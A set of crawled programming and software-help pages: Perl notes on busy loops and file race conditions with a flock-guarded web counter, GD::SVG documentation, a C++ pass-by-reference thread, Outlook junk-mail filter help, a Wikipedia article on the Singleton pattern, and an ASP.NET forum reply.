# this program attempts to use 100% of CPU time
use IO::Socket::INET;
my $sock = IO::Socket::INET->new(
    PeerAddr => '',
    PeerPort => 'http(80)',
    Proto    => 'tcp',
);
$sock->blocking(0);
while(1) {
    read $sock, my $buffer, 8192;
    do_something_with_data($buffer);
}

The program should sleep, waiting for data to arrive, rather than looping constantly and trying over and over again. See "SelectPollPattern" in SelectPollPattern for a solution using the select() call.

Signals to Wake By: sleep() and I/O operations are aborted by incoming signals, as sent from the shell with the "kill" command or from another process using the kill() function on your PID. When I/O is aborted, it returns a zero-length string, not undef. Read-loops using while() work correctly:

while(<$fh>) { print; }

This may print zero-length strings sometimes, but no one will ever know. while(<$fh>) continues looping. Sometimes you want to sleep for a fixed period, no matter what.

my $waketime = scalar(time()) + 60*60*8.5;   # longer on the weekends
while(scalar time() < $waketime) {
    sleep $waketime - scalar time();   # sleep the rest of the duration - probably
}

"DebuggingPattern" in DebuggingPattern has a tiny example of dumping stack when a signal comes in. When fork()ing, children send CHLD signals to their parent when the child dies. The parent should have a signal handler set up to reap these. Categories See Also

Problem: Multitasking operating systems change tasks at unexpected times, such as between two lines of the program, or halfway through a statement. This creates subtle bugs that pop up "now and then".
Solution: Use flock() and semaphores to guard access to things accessed by more than one process or thread.

Nature of the Race Condition

Malak tells you: wee! :-) ok here is the question. if i have two copies of a script downloading the same set of files (to make it go faster) i want to make sure that one script doesnt try to download the same file as the other. right now i'm using a -e check to see if the file exists but im not sure if this will ever cause a problem if both scripts happen to hit the same file at the same time

Yes, there is a race condition between the time that you test for the file with -e and when you create the file with open(). It could well happen that you test to see if the file is there, it isn't, and you go to open it for write and overwrite another process.

if(! -e $file) {
    open my $f, '>', $file;
    download($f);
}

You tell Malak: yes. use sysopen(). open for write but not create. if it returns error status, the race condition bit ya, move on to the next file
Malak tells you: not sure if i can do that. im calling an external program to actually do the download...
You tell Malak: why don't you use threads, then? then you can create a hash that is shared between all threads and use it to do locking

use threads::shared;
my %locks :shared;

Malak tells you: i wonder if the race condition matters though... which ever process finishes downloadig last should write the file and replace whatever the other file wrote, right?
You tell Malak: yeah
Malak tells you: i dont care if that happens, all i care about is that no files get corrupted, seemingly downloaded good when they arent
You tell Malak: actually, on unix, what would happen is the same would be downloaded, twice, at the same time, but only one of the inodes would actually exist on the filesystem, so when the other process closes its filehandle, the filesystem will deallocate the blocks

File-Access Race Conditions: Files require coordinated access when there is any chance that multiple processes could attempt to access the same file at the same time. It could be two instances of the same application running (Mozilla, mutt, gtk-gnutella), or it could be two fork()ed processes of the same application, or threads.

Below is a web counter that I cooked up as a quick amusement some time ago. It is a 1-bit animated GIF that displays 30 iterations of Conway's Game of Life [41] applied to the current hit number. At the time of this writing, it is at 3866. It uses flock() to guard access to the "counter" file, which contains the current hit number. Initially, I didn't bother, and every 1000 hits or so, it would reset to 0. Oops. Just as one process had opened the file for write and truncated it, the other process went to read the value, and got zero. The second process would finish after the first, and it would increment zero to get one, and write that back.

All of these dire warnings apply to access to datastructures in memory, such as those using Sys::Mmap, and to .dbm files accessed with dbmopen() or a similar routine. This code depends on the fine netpbm package. The lock should be established before reading, in cases where a value is read, modified, then written back - cases including counters like web counters.
#!/usr/bin/perl

print "Content-type: image/gif\n";
print "Pragma: no-cache\n";
print "\n";

my $pid = $$;   # our pid, not the pid of some shell or something
umask 000;
local $ENV{PATH} = '/usr/local/bin';

open my $f, '+<', 'counter' or die $!;
flock $f, 2;                     # LOCK_EX - hold the lock across read, modify, write
my $counter = <$f>;
$counter++;
seek $f, 0, 0;
print $f $counter, "\n";
close $f;

system "pbmtext $counter | pnmcrop 2>/dev/null | pnmenlarge 3 > counter10.$pid.pbm 2>/dev/null";
for(my $i=10; $i<30; $i++) {
    my $j = $i + 1;
    system "pbmlife counter$i.$pid.pbm > counter$j.$pid.pbm 2>/dev/null";
}

open my $gif, "ppmtogif -delay 40 -loop 100 counter??.$pid.pbm 2>/dev/null|" or die $!;
while(read $gif, my $buf, 1024) {
    print $buf;
}
close $gif;

# this isn't working :(
for(my $i=10; $i<31; $i++) {
    unlink "counter$i.$pid.pbm";
}

Didn't anyone ever tell you web-page hit counters were useless? They don't count number of hits, they're a waste of time, and they serve only to stroke the writer's vanity. It's better to pick a random number; they're more realistic. Here's a much better web-page hit counter:

$hits = int( (time() - 850_000_000) / rand(1_000) );

If the count doesn't impress your friends, then the code might. :-) - "PerlDoc" in PerlDoc:perlfaq5

When several processes are reading the current value (as it stands at any given moment), and one process is independently generating and storing new values, file I/O still has a race condition where the file may be null between the time the file is truncated and the new data written. This also requires locking. Elsewhere there is an example of a multi-player Life game, where locking is not needed. Single bits are modified in the Sys::Mmap'd image during any hit, and the current board is displayed. Since random memory access is being used rather than file I/O, truncated files aren't a concern.

SQL engines want something like this, but the problem is far more complex. They must use generational locks, where each "update" or "insert" represents a generation. Only records marked at or earlier than the current generation at the time a query is started are returned in a query. "update" must add a new record with a newly incremented generation number before removing the old one, in order to let currently executing queries run without garbled results. This arrangement lets one "insert"/"update" or other write operation happen at the same time as an arbitrary number of queries. Generational systems like this are also used in garbage collection, to avoid race conditions between the thread that is collecting unreferenced memory and the running program.

Thread Datastructure Race Conditions XXX. See Also

Synopsis: Anti-patterns stereotype pathological, degenerate code. The God Object anti-pattern afflicts Perl programs at a shocking rate. It is a holdover from top-down design in procedural languages. It's the first trap aspiring Object Oriented programmers fall into, so it's a suitable first Anti-Pattern. I assume that you know the basic syntax for creating objects in Perl. If not, go read Tom Christiansen's tutorial at [42], then come right back - this is the next thing you need to know.

Anti Patterns: Programming is fun. "Hacking on a program" is an expression of the glee that comes from rapidly adding neat features to a program. Programmers are optimists. We assume that each feature in the specification for a project can be added in a constant amount of time even as the code grows, and we add each new feature just like we added the last. In other words, that programs are completed in linear time.
The last half, recursively, takes twice as long. Unchecked code growth destroys a program from the inside out. Sure signs of unchecked growth abound. Code degeneration causes lack of programmer interest, which leads to forked Open Source projects, over-budget or failed commercial ventures, and most horrifically, loss of interest in working on a program that used to be fun. Reading difficult-to-comprehend code is work. If the quality of the code is good, this work is rewarded. If the quality is poor, the reader suffers the code with no joy or benefit. There are volumes full of difficult-to-understand code that people willingly pore over. Programming Pearls is one such book [44]. The reader's patience in studying the algorithms is rewarded with deep insight. Quality is difficult to put your thumb on and impossible to quantify. Just because code is difficult to read doesn't mean it isn't worth your time. It is our job to make it worth reading, worth keeping, worth reusing, and worth hacking on.

God Object Anti-Pattern: Named for the conspicuous centralization of control. It is a holdover from procedural languages and top-down design. Top-down design states that the way
http://search.cpan.org/~swalters/Object-PerlDesignPatterns-0.03/PerlDesignPatterns.pm
crawl-002
en
refinedweb
GD::SVG - Seamlessly enable SVG output from scripts written using GD

# use GD;
use GD::SVG;
# my $img = GD::Image->new();
my $img = GD::SVG::Image->new();
# $img->png();
$img->svg();

GD::SVG exports the same methods as GD itself, overriding those methods. GD::SVG requires Ronan Oger's SVG.pm module, Lincoln Stein's GD.pm module, libgd and its dependencies. The following are the primary weaknesses of GD::SVG. You must change direct calls to the classes that GD invokes: GD::Image->new() should be changed to GD::SVG::Image->new(). See the documentation above for how to dynamically switch between packages. As SVG documents are not inherently aware of their canvas, the flood fill methods are not currently supported. Although setPixel() works as expected, its counterpart getPixel() is not supported. I plan to support this method in a future release. GD::SVG works only with scripts that generate images directly in the code using the GD->new(height,width) approach. newFrom() methods are not currently supported. Any functions passed gdTiled objects will die. GD::SVG currently only supports the creation of image objects via its new constructor. This is in contrast to GD proper, which supports the creation of images from previous images, filehandles, filenames, and data. Once a GD::Image object is created, you can draw with it, copy it, and merge two images. When you are finished manipulating the object, you can convert it into a standard image file format to output or save to a file. GD::SVG implements a single output method, svg(). NOT IMPLEMENTED Provided with a color index, remove it from the color table. This returns the index of the color closest in the color table to the red, green and blue components specified. This method is inherited directly from GD. Example: $apricot = $myImage->colorClosest(255,200,180); NOT IMPLEMENTED NOT IMPLEMENTED Retrieve the color index of an rgb triplet (or -1 if it has yet to be allocated). NOT IMPLEMENTED NOT IMPLEMENTED Retrieve the total number of colors indexed in the image. NOT IMPLEMENTED Provided with a color index, return the RGB triplet. In GD::SVG, color indexes are replaced with actual RGB triplets in the form "rgb($r,$g,$b)". Control the transparency of individual colors. NOT IMPLEMENTED GD implements a number of special colors that can be used to achieve special effects. They are constants defined in the GD:: namespace, but automatically exported into your namespace when the GD module is loaded. GD::SVG offers limited support for these methods. Lines drawn with line(), rectangle(), arc(), and so forth are 1 pixel thick by default. Call setThickness() to change the line drawing width. NOT IMPLEMENTED The GD special color gdStyled is partially implemented in GD::SVG. Only the first color will be used to generate the dashed pattern specified in setStyle(). See setStyle() for additional information. NOT IMPLEMENTED NOT IMPLEMENTED NOT IMPLEMENTED Set the corresponding pixel to the given color. GD::SVG implements this by drawing a single dot in the specified color at that position. NOT IMPLEMENTED This draws a rectangle with the specified color. (x1,y1) and (x2,y2) are the upper left and lower right corners respectively. You may also draw with the special colors gdBrushed and gdStyled. NOT IMPLEMENTED NOT IMPLEMENTED Same as the previous example, except that it draws the text rotated counter-clockwise 90 degrees. NOT IMPLEMENTED NOT IMPLEMENTED NOT IMPLEMENTED getBounds() returns the width and height of the image.
NOT IMPLEMENTED NOT IMPLEMENTED NOT IMPLEMENTED NOT IMPLEMENTED SVG is much more adept at creating polygons than GD. That said, GD does provide some rudimentary support for polygons but must be created as seperate objects point by point. Create an empty polygon with no vertices. $poly = new GD::SVG::Polygon; Add point (x,y) to the polygon. $poly->addPt(0,0); $poly->addPt(0,50); $poly->addPt(25,25);); NOT IMPLEMENTED Return the number of vertices in the polygon. Return a list of all the verticies in the polygon object. Each mem- ber. Returns the number of vertices affected. Please see GD::Polyline for information on creating open polygons and splines.). This is a tiny, almost unreadable font, 5x8 pixels wide. This is the basic small font, "borrowed" from a well known public domain 6x12 font. This is a bold font intermediate in size between the small and large fonts, borrowed from a public domain 7x13 font; This is the basic large font, "borrowed" from a well known public domain 8x16 font. This is a 9x15 bold font converted by Jan Pazdziora from a sans serif X11 font. This returns the number of characters in the font. print "The large font contains ",gdLargeFont->nchars," characters\n"; NOT IMPLEMENTED This returns the ASCII value of the first character in the font These return the width and height of the font. ($w,$h) = (gdLargeFont->width,gdLargeFont->height); The Bio::Graphics package of the BioPerl project makes use of GD::SVG to export SVG graphics.: I've also prepared a number of comparative images at my website (shameless plug, hehe): The following internal methods are private and documented only for those wishing to extend the GD::SVG interface.. The _reset() method is used to restore persistent drawing settings between uses of stylized brushes. Currently, this involves - restoring line thickness. Todd Harris, PhD <[email protected]> Copyright 2003 by Todd Harris and the Cold Spring Harbor Laboratory This library is free software; you can redistribute it and/or modify it under the same terms as Perl itself. GD, SVG, SVG::Manual, SVG::DOM
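The synopsis above hints at switching between GD and GD::SVG dynamically; one hypothetical way to do that is shown below (the command-line flag and the drawing calls are illustrative only, not part of the module's documentation):

#!/usr/bin/perl
use strict;
use warnings;

# Pick the image class at runtime.  Pass "svg" on the command line
# to emit SVG via GD::SVG; anything else emits PNG via plain GD.
my $want_svg = @ARGV && $ARGV[0] eq 'svg';
my $class;
if ($want_svg) {
    require GD::SVG;
    $class = 'GD::SVG::Image';
} else {
    require GD;
    $class = 'GD::Image';
}

my $img   = $class->new(100, 100);
my $white = $img->colorAllocate(255, 255, 255);
my $black = $img->colorAllocate(0, 0, 0);
$img->rectangle(10, 10, 90, 90, $black);

binmode STDOUT unless $want_svg;   # PNG output is binary data
print $want_svg ? $img->svg : $img->png;

Because the rest of the drawing code only ever calls methods through $img, the same script body serves both backends; only the constructor class changes.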
http://search.cpan.org/~twh/GD-SVG-0.25/SVG.pm
crawl-002
en
refinedweb
Re: STL Vector - pass by reference?
- From: "Scott McPhillips [MVP]" <org-dot-mvps-at-scottmcp>
- Date: Thu, 09 Aug 2007 16:52:46 -0400

Gerry Hickman wrote:

Hi,

In an earlier thread entitled "STL vector - which style of for() loop?" I had a function that could populate a vector (with a variable number of strings) and pass it back to the caller, but people pointed out this would create a "copy" of the vector and it may be better to pass by reference. Doug Harrison offered this example:

----- example start -----
I would use pass-by-reference to avoid this needless cost, e.g.

vector<string>::size_type GetDeviceClasses(vector<string>& guids)
{
    guids.clear();
    // If you can estimate n, reserve can eliminate reallocations.
    // guids.reserve(n);
    ...
    return guids.size();
}
----- example end -----

but when I came to actually code this, I ran into some problems. I managed to code something that appears to achieve the objective, but my code is almost "back-to-front" (in terms of * and &) of what Doug posted. Can someone clarify?

----- my attempt -----
using namespace std; // just for this demo

vector<string> guids;
PopulateStrings(&guids);
cout << "Count of guids is now " << guids.size(); // prints 2

void PopulateStrings(vector<string> * guids)
{
    guids->clear();
    guids->push_back("test1");
    guids->push_back("test2");
}
----- end my attempt -----

There are two ways to "pass by reference." They are to pass a reference, or to pass a pointer. Doug showed using a reference, your version is using a pointer. Performance would be equal either way.

--
Scott McPhillips [MVP VC++]

- References:
- STL Vector - pass by reference?
- From: Gerry Hickman
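For completeness, here is a small self-contained sketch of both spellings side by side; the function names are illustrative, not from the thread, and as Scott notes, neither version copies the vector:

#include <iostream>
#include <string>
#include <vector>
using namespace std;

// Pass by reference: the call site looks like an ordinary call
void FillByReference(vector<string>& guids)
{
    guids.clear();
    guids.push_back("test1");
    guids.push_back("test2");
}

// Pass by pointer: the caller must take the address with &
void FillByPointer(vector<string>* guids)
{
    guids->clear();
    guids->push_back("test1");
    guids->push_back("test2");
}

int main()
{
    vector<string> a, b;
    FillByReference(a);
    FillByPointer(&b);
    cout << a.size() << " " << b.size() << endl; // prints "2 2"
    return 0;
}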
http://www.tech-archive.net/Archive/VC/microsoft.public.vc.language/2007-08/msg00329.html
crawl-002
en
refinedweb
Re: Compact and repair problems
- From: "Granny Spitz via AccessMonster.com" <u26473@uwe>
- Date: Thu, 26 Oct 2006 19:05:54 GMT

enak wrote:
Any way, this morning when he tried to run the compact and repair utility he got an error that states "Microsoft Access has encountered a problem and needs to close". That is it.

Make a copy of the file and work only with the copy. Keep the original intact in case you need to send it to a recovery company. Press the shift key down while opening the copy so the startup code doesn't execute. Open a module and compile the code if it's not compiled. Create a new database and import all objects from this copy into the new database. Try compacting the new database.

--
Message posted via
http://www.tech-archive.net/Archive/Access/microsoft.public.access.gettingstarted/2006-10/msg00653.html
crawl-002
en
refinedweb
How do I turn on the junk email feature? From: Chuck Davis (anonymous_at_discussions.microsoft.com) Date: 11/03/04 - ] Date: Tue, 2 Nov 2004 18:42:53 -0800 >-----Original Message----- >I have microsoft xp and I want to filter out some of the junk email but >outlook tells me that the junk email feature needs to be turned on, how do i >do that? >. > The following is from Outlook Help! The new Junk E-mail Filter replaces the rules used in previous versions of Microsoft Outlook to filter e-mail messages. The Junk E-mail Filter is on by default, and the protection level is set to Low, which is designed to catch the most obvious junk e-mail messages. Any message that is caught by the Junk E-mail Filter is moved to a special Junk E-mail folder, where you can retrieve or review it at a later time. You can make the filter more aggressive, which may mistakenly catch legitimate messages, or you can even set Microsoft Office Outlook 2003 to permanently delete junk e-mail messages. There are two parts to the Junk E-mail Filter: the Junk developed by Microsoft Research that evaluates whether an unread message should be treated as a junk e-mail message based on several factors, such as the time it. Note Text marked with an orange asterisk () indicates a feature that is introduced with Microsoft Office 2003 Service Pack 1. To get Service Pack 1, go to Downloads on Office Online. Under Office Update, click Check for Updates. Junk E-mail Filter Updates Updates to the Junk E-mail Filter are available at Downloads on Office Online. Under Office Update, click Check for Updates. Junk E-mail Filter Lists There are five Junk E-mail Filter Lists: Safe Senders List (Safe Senders List: A list of domain names and e-mail addresses that you want to receive messages from. E-mail addresses in Contacts and in the Global Address Book are included in this list by default.), Safe Recipients List (Safe Recipients List: A list of mailing lists or other subscription domain names and e-mail addresses that you belong to and want to receive messages from. Messages sent to these addresses will not be treated as junk e-mail.), Blocked Senders List (Blocked Senders List: A list of domain names and e-mail addresses that you want to be blocked. E-mail addresses and domain names on this list are always treated as junk e-mail or spam.), and two International lists: Blocked Encodings List (Blocked Encodings List: A list that allows you to block a language encoding or character set in order to filter out unwanted international e-mail messages that display in a language you don't understand.) and Blocked Top-Level Domains List (Blocked Top-Level Domains List: A list that allows you to block top-level domain names. Blocking country/region top-level domains allows you to filter unwanted e-mail messages you receive from specific countries or regions.). If a name or e-mail address is on both the Blocked Senders List and the Safe Senders List, the Safe Senders List takes precedence over the Blocked Senders List; this reduces the possibility that messages that you want will be mistakenly marked as junk e-mail messages.. default. Therefore, messages from people in your Contacts folder will never be treated as junk e-mail messages. Contacts but are people whom you correspond with regularly are included in this list by default through the Automatically add people I e-mail to the Safe Senders List check box. 
Notes The recipient's e-mail address is saved by default only when you create and send the message the usual way in Outlook, as opposed to a message generated automatically by a program. Personal distributions lists will not be added by using this check box. If you accidentally reply to a spammer's e-mail message- for example, to unsubscribe- and this check box is selected, that spammer's address will be added to the Safe Senders List. If you notice the spammer's subsequent messages in your Inbox, you must add them to the Blocked Senders List and remove the corresponding entry from the Safe Senders List. If the same address is in both the Blocked Senders List and the Safe Senders List, the Safe Senders List takes precedence and the address will not be considered junk.. You can also configure Outlook to accept messages only from people on your Safe Senders List, giving you total control over which messages are delivered to your Inbox. certain e-mail address or domain name by adding the sender to this list. Messages from people or domain names on this list are always treated as junk, regardless of the content of the message. When you add a sender's name or e-mail address to the Blocked Senders List, Outlook moves the message to the Junk E-mail folder. If Automatic Picture Download is turned off, messages from or to e-mail addresses or domain names on the Safe Senders List and Safe Recipients List will be treated as exceptions and the blocked content will be downloaded. If you have existing lists of safe or blocked names and addresses, you can import this information into Outlook 2003 by saving the list as a text (.txt) file with one entry per line, and then importing the list. If you want to share your Junk E-mail Filter Lists, create a copy for backup purposes, or print a list, you can export the e-mail addresses on the list to a text (.txt) file. entries take precedence over domain name entries. To block an entire domain but still see specific safe addresses, add the specific entries to the Safe Senders List. For example, add [email protected] to the Safe Senders List and @example.com to your Blocked Senders List. This blocks any address except [email protected]. International List To block unwanted e-mail messages that come from another country or region or appear in another language, there are two lists. Blocked Top-Level Domains List This list enables you to block e-mail addresses that end in a specific top-level domain (top-level domain: The broadest name category at the end of e-mail addresses. Generic top-level domains include .com, .edu, .gov, .net, and .org. Country code top-level domains use two letters, for example, [email protected] and [email protected].). For example, selecting the CA [Canada], US [United States], and MX [Mexico] check boxes in the list would block messages with e-mail addresses like these: [email protected], [email protected], and [email protected]. Additional country codes appear in the list. This helps you to eliminate unwanted e-mail messages that you receive from specific countries or regions. Blocked Encodings List This list enables you to block all e-mail addresses in a specific language encoding (encoding: A method for representing characters in HTML or plain-text e-mail messages, examples include US-ASCII, Unicode (UTF-8), and Western European (ISO). Outlook automatically selects an optimal encoding for outgoing the vast majority of junk e-mail is sent in the US-ASCII encoding. 
The remaining junk e-mail is sent in various other international encodings, so this list gives you the ability to filter out unwanted international e-mail that is displayed in a language that you don't understand. Notes Unicode (Unicode: A character encoding standard developed by the Unicode Consortium. By using more than one byte to represent each character, Unicode enables almost all of the written languages in the world to be represented by using a single character set.) encodings are not included in the Blocked Encodings List. Messages with unknown or unspecified encodings will be subject to filtering by the regular Junk E-mail Filter. The Junk E-mail Filter can be used with the following types of e-mail accounts: A Microsoft Exchange Server e-mail account in Cached Exchange Mode An Exchange Server account that delivers.) HTTP (HTTP (Hypertext Transfer Protocol): Protocol that is used when you access Web pages from the Internet. Outlook uses HTTP as an e-mail protocol.) (MSN Hotmail) POP3 (POP3: A common protocol that is used to retrieve IMAP (IMAP (Internet Message Access Protocol): Unlike Internet e-mail protocols such as POP3, IMAP creates folders on a server to store/organize messages for retrieval by other computers. You can read message headers only and select which messages to download.) Microsoft Office Outlook Connector for IBM Lotus Domino Outlook Connector for MSN All e-mail accounts in the same Outlook user profile (Outlook user profile: A group of e-mail accounts and address books. Typically, a user needs only one but can create any number, each with a set of e-mail accounts and address books. Multiple profiles are useful if more than one person uses the computer.) share the same Junk E-mail settings and lists. If you have both an Exchange Server has a Junk E-mail folder. However, If you have both an Exchange Server e-mail account and a POP3 account, both If you change your profile, you should export a copy of your Junk E-mail Lists before making the changes, and then import the information into Outlook 2003 to avoid having to re-create your Junk E-mail Filter Lists. Different versions of Microsoft Exchange Server and the Junk E-mail Filter Versions earlier than Microsoft Exchange Server 2003 If you use Cached Exchange Mode or download to a Personal Folders file (.pst) You can create and use the Junk available from any computer that you use. Note that if you use both Cached Exchange Mode and download to a Personal Folders file (.pst) as your default delivery location, the Junk E-mail Filter Lists will be available only on the computer used to add the names and addresses. If you work online The Junk E-mail Filter is not available. Exchange Server 2003 If you use Cached Exchange Mode or download to a Personal Folders file (.pst). If you work online. Note If you work online or use Cached Exchange Mode and download to a Personal Folders file (.pst) as your default delivery location, the Junk E-mail Filter Lists will be available only on the computer used to add the names and addresses. Rules and the Junk E-mail Filter Rules are now designed so that they do not act on messages that have been moved to the Junk E-mail folder. This keeps than moving it to another folder according to the rule. Best practices for managing junk e-mail. Turn off automatic processing of meeting requests and read and delivery receipts Spammers sometimes resort to sending meeting requests and messages with delivery receipts requested. 
Responding to meeting requests and read and delivery receipts automatically makes you vulnerable to Web beacons. Limit where you post your e-mail address Be cautious about posting your e-mail address on public Web sites, and remove your e-mail address from your personal Web site. If you list or link to your e-mail address, you can expect to be spammed. Disguise (or "munge") your e-mail address when you post it to a newsgroup, chat room, bulletin board, or other public places For example, you can give your e-mail address as "[email protected]" by using the number zero instead of the letter "o." This way, a person can interpret your address, but the automated programs that spammers use cannot. Use multiple e-mail addresses for different purposes You might set up one for personal use to correspond with friends, family, or colleagues, and use another for more public activities, such as requesting information, shopping, or for subscribing to newsletters, discussion lists, and newsgroups. Review the privacy policies of Web sites When you sign up for online banking, shopping, and newsletters, review the privacy policy closely before you reveal your e-mail address and other personal information. Look at the Web site for a link (usually at the bottom of the home page) or section called "Privacy Statement," "Privacy Policy," "Terms and Conditions," or "Terms of Use." If the Web site does not explain how it will use your personal information, think twice about using that service.. Don't reply to spam Don't reply even to unsubscribe unless you know and trust the sender. Answering spam just confirms that your e-mail address is live. If a company uses e-mail messages to ask for personal information, don't respond by sending a message Most legitimate companies will not ask for personal information in e-mail. Be suspicious if they do. It could be a spoofed tactic is known as "phishing" because, as the name implies, the spam is used as a means to "fish" for your credentials, such as your account number and passwords that are necessary to access and manipulate your financial accounts. If the spam is from a company that you do business with - for example, your credit card company - call the company, but don't use a phone number provided on the e-mail. Use a number that you find yourself, either through directory assistance, a bank statement, a bill, or other source. If it is a legitimate request, the telephone operator should be able to help you. Don't contribute to a charity based on a request in e-mail Unfortunately, some spammers prey on your good will. If you receive an appeal from a charity, treat it as spam. If it is a charity that you want to support, find their number elsewhere and call them to find out how you can make a contribution. Don't forward chain e-mail messages Besides causing more traffic over the line, forwarding a chain e-mail message might be furthering a hoax, and you lose control over who sees your e-mail address. - ]
http://www.tech-archive.net/Archive/Outlook/microsoft.public.outlook.general/2004-11/0958.html
crawl-002
en
refinedweb
actions across the system. Sometimes it is generalized to systems that operate more efficiently when only one or a few objects exist. It is also considered an anti-pattern by some people, who feel that it is overused, introducing unnecessary limitations in situations where a sole instance of a class is not actually required, and introduces global state into an application. [1][2][3][4][5][6]

Common uses
- The Abstract Factory, Builder, and Prototype patterns can use Singletons in their implementation.
- Facade objects are often Singletons because only one Facade object is required.
- State objects are often Singletons.
- Singletons are often preferred to global variables because:

Class diagram

Implementation

protected (not private, because reuse and unit test could need to access the constructor).

Example implementations

Java

The Java programming language solutions provided here are all thread-safe but differ in supported language versions and lazy-loading.

Traditional simple way

This solution is thread-safe without requiring special language constructs, but it may lack the laziness of the one below. The INSTANCE is created as soon as the Singleton class is initialized. That might even be long before getInstance() is called. It might be (for example) when some static method of the class is used. If laziness is not needed or the instance needs to be created early in the application's execution, or your class has no other static members or methods that could prompt early initialization (and thus creation of the instance), this (slightly) simpler solution can be used:

public class Singleton {
    private static final Singleton INSTANCE = new Singleton();

    // Private constructor prevents instantiation from other classes
    private Singleton() {}

    public static Singleton getInstance() {
        return INSTANCE;
    }
}

The solution of Bill Pugh is known as the initialization on demand holder idiom, is as lazy as possible, and works in all known versions of Java. It takes advantage of language guarantees about class initialization, and will therefore work correctly in all Java-compliant compilers and virtual machines. The inner class is referenced no earlier (and therefore loaded no later) than the moment that getInstance() is called:

public class Singleton {
    // Private constructor prevents instantiation from other classes
    private Singleton() {}

    private static class SingletonHolder {
        private static final Singleton INSTANCE = new Singleton();
    }

    public static Singleton getInstance() {
        return SingletonHolder.INSTANCE;
    }
}

C#

/// <summary>
/// Thread-safe singleton example without using locks
/// </summary>
public sealed class Singleton
{
    private static readonly Singleton instance = new Singleton();

    // Explicit static constructor to tell C# compiler
    // not to mark type as beforefieldinit
    static Singleton() { }

    private Singleton() { }

    /// <summary>
    /// The public Instance property to use
    /// </summary>
    public static Singleton Instance
    {
        get { return instance; }
    }
}

Python

class Singleton(type):
    def __init__(cls, name, bases, dict):
        super(Singleton, cls).__init__(name, bases, dict)
        cls.instance = None

    def __call__(cls, *args, **kw):
        if cls.instance is None:
            cls.instance = super(Singleton, cls).__call__(*args, **kw)
        return cls.instance

class MyClass(object):
    __metaclass__ = Singleton

print MyClass()
print MyClass()

Prototype-based singleton

In a prototype-based programming language, where objects but not classes are used, a "singleton" simply refers to an object without copies or that is not used as the prototype for any other object. Example in Io:

Foo := Object clone
Foo clone := Foo

Example of use with the factory method pattern

The singleton pattern is often used in conjunction with the factory method pattern; for example, an AWT Window is bound to the platform-specific java.awt.peer.WindowPeer implementation.
Neither the Window class nor the application using the window needs to be aware of which platform-specific subclass of the peer is used.

Drawbacks

It should be noted that this pattern makes unit testing far more difficult[9], as it introduces global state into an application. Advocates of Dependency Injection would regard this as an anti-pattern, mainly due to its use of private and static methods. In a nod to the concept of 'Code Smells', this pattern has also been known as the Stinkleton pattern (coined by Robert Penner).

References
- ^ Alex Miller. Patterns I hate #1: Singleton, July 2007
- ^ Scott Densmore. Why singletons are evil, May 2004
- ^ Steve Yegge. Singletons considered stupid, September 2004
- ^ J.B. Rainsberger, IBM. Use your singletons wisely, July 2001
- ^ Chris Reath. Singleton I love you, but you're bringing me down, October 2008
- ^
- ^ Gamma, E, Helm, R, Johnson, R, Vlissides, J: "Design Patterns", page 128. Addison-Wesley, 1995
- ^ Pugh, Bill (November 16, 2008). "The Java Memory Model". Retrieved on April 27, 2009.
- ^
- "C++ and the Perils of Double-Checked Locking" Meyers, Scott and Alexandrescu, Andrei, September 2004.
- "The Boost.Threads Library" Kempf, B., Dr. Dobb's Portal, April 2003.

External links
- Singleton Design Pattern in Java
- Singletons are Pathological Liars by Miško Hevery
- Java Singleton Design Pattern
- The "Double-Checked Locking is Broken" Declaration (Java)
- Java Singleton Pattern
- A Pattern Enforcing Compiler that enforces the Singleton pattern amongst other patterns
- Description from the Portland Pattern Repository
- Implementing the Singleton Pattern in C# by Jon Skeet
- A Threadsafe C++ Template Singleton Pattern for Windows Platforms by O. Patrick Barnes
- Implementing the Inheritable Singleton Pattern in PHP5
- Singleton Pattern and Thread Safety
- PHP patterns
- Javascript implementation of a Singleton Pattern by Christian Schaefer
- Singletons Cause Cancer by Preston Lee
- Singleton examples
- Article "Double-checked locking and the Singleton pattern" by Peter Haggar
- Article "Use your singletons wisely" by J. B. Rainsberger
- Article "Simply Singleton" by David Geary
- Article "Description of Singleton" by Aruna
- Article "Why Singletons Are Controversial"
- The Google Singleton Detector analyzes Java bytecode to detect singletons, so that their usefulness can be evaluated.
- Jt J2EE Pattern Oriented Framework
- Serialization of Singleton in Java
- Singleton at Microsoft patterns & practices Developer Center
- Singleton Pattern in Cairngorm 2.1 with Actionscript 3
- Standard way of implementing Singletons in ActionScript 3

This entry is from Wikipedia, the leading user-contributed encyclopedia. It may not have been reviewed by professional editors (see full disclaimer)
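To make the testing drawback above concrete, here is a small hypothetical Python illustration (not from the article): two tests that share a singleton also share its state, so their outcome depends on the order in which they run.

class Counter(object):
    _instance = None

    def __new__(cls):
        # Return the one shared instance, creating it on first use
        if cls._instance is None:
            cls._instance = super(Counter, cls).__new__(cls)
            cls._instance.count = 0
        return cls._instance

def test_one():
    counter = Counter()
    counter.count += 1
    assert counter.count == 1   # passes only if this test runs first

def test_two():
    counter = Counter()
    counter.count += 1
    assert counter.count == 1   # fails when run after test_one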
http://www.answers.com/topic/singleton-pattern
crawl-002
en
refinedweb
Re: How to call a Sub function from .ASPX file ? - From: "Kevin Spencer" <kevin@xxxxxxxxxxxxxxxxxxxxxxxxxx> - Date: Wed, 10 Aug 2005 17:44:15 -0400 Sorry dude, it may be all YOU need, but my requirements go a good bit farther. -- HTH, Kevin Spencer Microsoft MVP ..Net Developer Everybody picks their nose, But some people are better at hiding it. "tom pester" <Tom.PesterDELETETHISSS@xxxxxxxxxx> wrote in message news:a1a977a2e3efa8c76c0ed0ef52f2@xxxxxxxxxxxxxxxxxxxxx > Hi Kevin, > > This article is what you need when using asp.net 1.1 > > > > It gest even simpler if you use asp.net v2. In this cas just drop the > class file in the App_Code directory and you can call them everywhere. > > Let me know if you have any more questions... > > Cheers, > Tom Pester > >> You're not thinking fourth-dimensionally! (- Back to the Future) >> >> Actually, you're not thinking Object-Orientationally. >> >> ASP.Net is object-oriented, and you'd better get acquainted with it, >> or you'll be visiting here almost daily, and writing crappy code until >> you do. Let me elaborate, if you will: >> >> Files are source code. Your application doesn't have files. It has >> classes. A file defines a class, but IS not a class. A class is a data >> type, and exists in the context of a running application. So, when >> you're talking about how your application works, the first thing you >> need to do is think about classes, not files. A file can contain one >> or MORE class definitions, and you need to get acquainted with classes >> to be successful with .Net. >> >> Classes are very important in .Net programming; Objects are made from >> classes, and classes provide encapsulation. Object-oriented >> programming can get pretty darned complex, and encapsulation can save >> you a lot of grief, by hiding those things which need hiding from >> those things that don't need them. >> >> If you have a file with a bunch of Subs and Functions in it, you need >> to create a class with Subs and Functions in it. These Subs and >> Functions can be Shared 